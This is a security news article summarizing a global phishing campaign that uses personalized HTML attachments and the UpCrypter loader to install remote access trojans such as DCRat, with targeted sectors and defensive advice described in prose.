New Phishing Attack Deploys RATs Using UpCrypter Evasion
▼ Summary
– A global phishing campaign uses personalized emails with HTML attachments that redirect to fake websites tailored to each recipient’s email and company logo.
– The attack delivers a ZIP archive containing obfuscated JavaScript, which executes PowerShell commands to evade detection and retrieve further payloads from attacker-controlled servers.
– The custom loader UpCrypter checks for forensic tools and virtual environments, forces system restarts if analysis is suspected, and downloads additional malware components while establishing persistence.
– Final payloads include remote access tools like PureHVNC, DCRat, and Babylon RAT, enabling keylogging, file theft, and full remote control of compromised systems.
– The campaign is rapidly expanding, targeting industries such as manufacturing, technology, and healthcare, and is described as a sophisticated attack chain rather than a simple credential theft scheme.
A sophisticated global phishing operation has been identified, using highly personalized emails and counterfeit websites to distribute malicious downloads. Security experts warn that this campaign employs a custom loader known as UpCrypter to deploy multiple remote access trojans (RATs), enabling prolonged unauthorized access to infected systems.
The attack begins with targeted phishing emails containing HTML attachments. These attachments redirect users to fake websites that have been carefully crafted to appear legitimate. The sites often include the recipient’s email address and may even display their company logo, making the deception more convincing.
Several variations of this campaign have been observed. One version uses a voicemail-themed email, falsely informing the recipient of a missed call and prompting them to open an HTML file. Another variant, written in Chinese, mimics a purchase order and similarly leads to a malicious site through an embedded HTML attachment.
Once redirected, victims are encouraged to download a ZIP file housing an obfuscated JavaScript payload. This script then executes PowerShell commands designed to evade detection mechanisms and fetch additional malicious components from remote servers controlled by the attackers. In some instances, data is concealed within image files using steganography to further bypass security scans.
Central to this operation is UpCrypter, a custom loader that has been publicly promoted by its developer. Before executing, the malware conducts checks for the presence of forensic tools, virtual machines, or sandbox environments. If it detects any signs of analysis, it triggers a system reboot to disrupt investigation efforts. Once it confirms a suitable environment, UpCrypter proceeds to download and execute additional payloads directly in memory, while also modifying registry keys to ensure persistence.
Final-stage malware observed in these attacks includes tools like PureHVNC, DCRat, and Babylon RAT. These RATs provide attackers with extensive capabilities, including keylogging, file exfiltration, and complete remote control over compromised devices.
The campaign is rapidly expanding, with detection rates doubling within a two-week period. Sectors most heavily impacted include manufacturing, technology, healthcare, construction, and retail/hospitality. Researchers emphasize that this is not a simple credential-harvesting operation but a multi-stage intrusion designed to embed advanced malware within corporate networks.
Organizations are urged to implement robust email filtering solutions and conduct regular employee training to improve awareness and resilience against such evolving threats.
(Source: Info Security)
